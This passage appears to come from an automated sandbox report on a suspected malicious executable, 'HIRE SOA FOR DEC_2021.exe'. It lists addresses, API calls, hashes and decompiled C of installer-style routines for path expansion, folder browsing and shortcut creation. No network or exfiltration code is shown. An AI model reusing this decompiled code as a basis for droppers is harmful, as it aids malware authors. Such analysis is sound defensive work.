0x0040427b
0x00404282
0x0040428e
0x0040429c
0x004042a4
0x004042a8
0x004042ae
0x004042ae
0x004042ba
0x0040432e
0x00404335
0x0040440a
0x00404411
0x00404420
0x00404420
0x00404424
0x0040442a
0x00404437
0x00404439
0x00404439
0x00404447
0x0040444c
0x0040444f
0x00404456
0x00404459
0x00404490
0x00404492
0x00404498
0x0040449f
0x004044a1
0x004044a1
0x004044bd
0x004044f9
0x00000000
0x004044bf
0x004044c2
0x004044d6
0x004044d8
0x00000000
0x004044d8
0x0040445b
0x0040445f
0x0040448e
0x0040448e
0x00000000
0x00000000
0x00000000
0x00000000
0x00404461
0x00404461
0x0040446e
0x00404473
0x00000000
0x00000000
0x00404477
0x00404479
0x00404479
0x00404484
0x00404487
0x0040448c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040448c
0x004044e7
0x004044ee
0x004044f5
0x004044fc
0x004044fc
0x00404501
0x00404503
0x0040450b
0x00404511
0x00404511
0x00404521
0x0040452b
0x00404533
0x00404549
0x00404535
0x00404539
0x00404539
0x00404533
0x0040454e
0x00404553
0x00404558
0x00404561
0x00404561
0x0040456a
0x0040456c
0x0040456c
0x00404578
0x00404580
0x0040458a
0x0040458a
0x0040458f
0x00000000
0x0040458f
0x00404459
0x00404413
0x0040441a
0x00000000
0x00000000
0x00000000
0x0040441a
0x0040433b
0x00404341
0x0040435b
0x00404360
0x0040436a
0x00404371
0x00404380
0x00404383
0x00404386
0x0040438d
0x00404395
0x00404398
0x0040439c
0x004043a3
0x004043ab
0x00404403
0x004043ad
0x004043ae
0x004043b5
0x004043bf
0x004043c7
0x004043d4
0x004043e8
0x004043ec
0x004043ec
0x004043e8
0x004043f1
0x004043fc
0x004043fc
0x004043ab
0x00000000
0x00404360
0x0040434e
0x00000000
0x00000000
0x00404354
0x00000000
0x004042bc
0x004042bc
0x004042c8
0x004042d2
0x004042df
0x004042df
0x004042e5
0x004042ee
0x004042f7
0x004042fa
0x004042fd
0x00404305
0x00404308
0x0040430b
0x00404313
0x0040431a
0x00404321
0x00404595
0x004045a7
0x004045a7
0x0040432c
0x00000000
0x0040432c

APIs

GetDlgItem.USER32 ref: 004042C1
SetWindowTextA.USER32(?,?), ref: 004042EE
SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
CoTaskMemFree.OLE32(00000000), ref: 004043AE
lstrcmpiA.KERNEL32(znrugtwz,00420498,00000000,?,?), ref: 004043E0
lstrcatA.KERNEL32(?,znrugtwz), ref: 004043EC
SetDlgItemTextA.USER32 ref: 004043FC

Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
SetDlgItemTextA.USER32 ref: 00404549

Strings

znrugtwz, xrefs: 004043DA, 004043DF, 004043EA
C:\Users\user\AppData\Local\Temp, xrefs: 004043C9
A, xrefs: 0040439C

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\AppData\Local\Temp$znrugtwz
API String ID: 2246997448-3482952260
Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59

Uniqueness

Uniqueness Score: -1.00%

Function 00405AA7 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				signed int _t73;
				signed char _t74;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t73 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E004059E3(_t84,  *0x423ea8);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405CE3(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423ea4;
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405AA7(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A85(_a4, _t37);
			}

0x00405aa7
0x00405aa7
0x00405aa7
0x00405aad
0x00405ab2
0x00405ac3
0x00405ac3
0x00405ace
0x00405ad0
0x00405ad5
0x00405ad8
0x00405ad9
0x00405ae0
0x00405ae2
0x00405ae8
0x00405aeb
0x00405aeb
0x00405cc0
0x00405cc0
0x00405cc4
0x00000000
0x00000000
0x00405af8
0x00405afe
0x00000000
0x00000000
0x00405b04
0x00405b05
0x00405b08
0x00405b0b
0x00405cb3
0x00405cbd
0x00405cbf
0x00405cbf
0x00405cb5
0x00405cb7
0x00405cb9
0x00405cba
0x00405cba
0x00000000
0x00405cb3
0x00405b11
0x00405b15
0x00405b1a
0x00405b29
0x00405b2c
0x00405b2e
0x00405b33
0x00405b36
0x00405b39
0x00405b3c
0x00405b3f
0x00405b42
0x00405c5d
0x00405c60
0x00405c90
0x00405c93
0x00405c98
0x00405c9c
0x00405c9c
0x00405ca1
0x00405ca2
0x00405ca7
0x00405caa
0x00405cac
0x00000000
0x00405cac
0x00405c62
0x00405c65
0x00405c7a
0x00405c81
0x00405c67
0x00405c6e
0x00405c6e
0x00405c89
0x00405c8c
0x00405c55
0x00405c56
0x00405c56
0x00000000
0x00405c8c
0x00405b4a
0x00405b4b
0x00405b51
0x00405b53
0x00405b6d
0x00405b6d
0x00405b74
0x00405b74
0x00405b7b
0x00405b7f
0x00405b7f
0x00405b80
0x00405b82
0x00405bbb
0x00405bbe
0x00405bce
0x00405bd1
0x00405bd9
0x00405bdf
0x00405bdf
0x00405c3b
0x00405c3b
0x00405c3d
0x00000000
0x00000000
0x00405be3
0x00405bea
0x00405beb
0x00405bed
0x00405c07
0x00405c15
0x00405c1b
0x00405c1d
0x00405c38
0x00405c38
0x00405c38
0x00000000
0x00405c38
0x00405c23
0x00405c2e
0x00405c34
0x00405c36
0x00000000
0x00000000
0x00000000
0x00405c36
0x00405bef
0x00405bf2
0x00000000
0x00000000
0x00405c01
0x00405c03
0x00405c05
0x00000000
0x00000000
0x00000000
0x00405c05
0x00000000
0x00405c3b
0x00405bc6
0x00000000
0x00405b84
0x00405b89
0x00405b9f
0x00405ba4
0x00405ba7
0x00405c44
0x00405c44
0x00405c48
0x00405c50
0x00405c50
0x00000000
0x00405c48
0x00405bb1
0x00405c3f
0x00405c3f
0x00405c42
0x00000000
0x00000000
0x00000000
0x00405c42
0x00405b82
0x00405b55
0x00405b59
0x00000000
0x00000000
0x00405b5b
0x00405b5f
0x00000000
0x00000000
0x00405b61
0x00405b65
0x00000000
0x00405b67
0x00405b67
0x00000000
0x00405b67
0x00405b65
0x00405cca
0x00405cd4
0x00405ce0
0x00405ce0
0x00000000

APIs

GetVersion.KERNEL32(?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
GetSystemDirectoryA.KERNEL32(znrugtwz,00000400), ref: 00405BC6
GetWindowsDirectoryA.KERNEL32(znrugtwz,00000400), ref: 00405BD9
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
SHGetPathFromIDListA.SHELL32(00000000,znrugtwz), ref: 00405C23
CoTaskMemFree.OLE32(00000000), ref: 00405C2E
lstrcatA.KERNEL32(znrugtwz,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
lstrlenA.KERNEL32(znrugtwz,?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2

Strings

znrugtwz, xrefs: 00405AD0, 00405B93, 00405BB0, 00405BC5, 00405BD8, 00405BF4, 00405C1F, 00405C4F, 00405C55, 00405C6D, 00405C80, 00405C9B, 00405CA1, 00405CAC, 00405CD6
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405C4A
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405B95

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$znrugtwz
API String ID: 900638850-2763887420
Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E

Uniqueness

Uniqueness Score: -1.00%

Function 00402012 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E004055E5(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x0040201b
0x00402025
0x0040202e
0x00402038
0x00402041
0x0040204b
0x0040204f
0x0040204f
0x00402054
0x00402065
0x0040206d
0x0040214d
0x0040214d
0x00402154
0x00402073
0x00402073
0x00402084
0x00402088
0x0040208e
0x00402098
0x0040209a
0x004020a5
0x004020a8
0x004020b5
0x004020b7
0x004020b9
0x004020c0
0x004020c3
0x004020c3
0x004020c6
0x004020d0
0x004020d8
0x004020dd
0x004020e9
0x004020e9
0x004020ec
0x004020f5
0x004020f8
0x00402101
0x00402106
0x00402118
0x00402127
0x00402129
0x00402135
0x00402135
0x00402127
0x00402137
0x0040213d
0x0040213d
0x00402140
0x00402146
0x0040214b
0x00402160
0x00000000
0x00000000
0x00000000
0x0040214b
0x00402156
0x00402880
0x0040288c

APIs

CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040209D

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-47812868
Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00402630 Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E004059E3(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405A85();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402648
0x0040265c
0x00402667
0x00402668
0x004027a3
0x0040264a
0x0040264a
0x0040264c
0x0040264e
0x0040264e
0x00402880
0x0040288c

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A

Uniqueness

Uniqueness Score: -1.00%

Function 1AC70A17 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.678689283.000000001AC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 1AC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1ac70000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a6acc3c1b38902cc7ca2e75eb8a5b54aa8f0b6c9d76eb44733cca5661b6d40c
Instruction ID: c48b0f526320728360006aa46c4d6735420b03db103c76df9c96a602e61d3904
Opcode Fuzzy Hash: 3a6acc3c1b38902cc7ca2e75eb8a5b54aa8f0b6c9d76eb44733cca5661b6d40c
Instruction Fuzzy Hash: 18A1F25495D2EDADCB06CBE945647FCBFB05D2A102F0845CAE0E5E6283C53A938EDB21

Uniqueness

Uniqueness Score: -1.00%

Function 1AC70616 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.678689283.000000001AC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 1AC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1ac70000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction ID: 08e74142aabbf80c05ae60282f0a88ebe727a855e54943902cc25b033717ccab
Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction Fuzzy Hash: 4411A37EA10109AFCB109BEAC898CAAF7FDEF856A175140AAEC04D3214E7709E40C760

Uniqueness

Uniqueness Score: -1.00%

Function 1AC70706 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.678689283.000000001AC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 1AC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1ac70000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction ID: ee4d4fcd85023203fd7a9a7edbf3c9051ff588d6e1d785adf38b11832e9cfd77
Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction Fuzzy Hash: F2E09A39760648DFCB04CBB8C881D55B3F8EB08231B018294F829C73A0EA34FE00DB90

Uniqueness

Uniqueness Score: -1.00%

Function 1AC70744 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.678689283.000000001AC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 1AC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1ac70000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction ID: 424580dc6c78c5c54a38971d55a44fa1451e33bf46cae26703b9eb6a731d7584
Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction Fuzzy Hash: 2EE0BF3E711650DBC361DA99D580952F3E9EB885B2716486AE959D7611C620FC018B50

Uniqueness

Uniqueness Score: -1.00%

Function 1AC706C7 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.678689283.000000001AC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 1AC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1ac70000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 00403964 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42047c = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
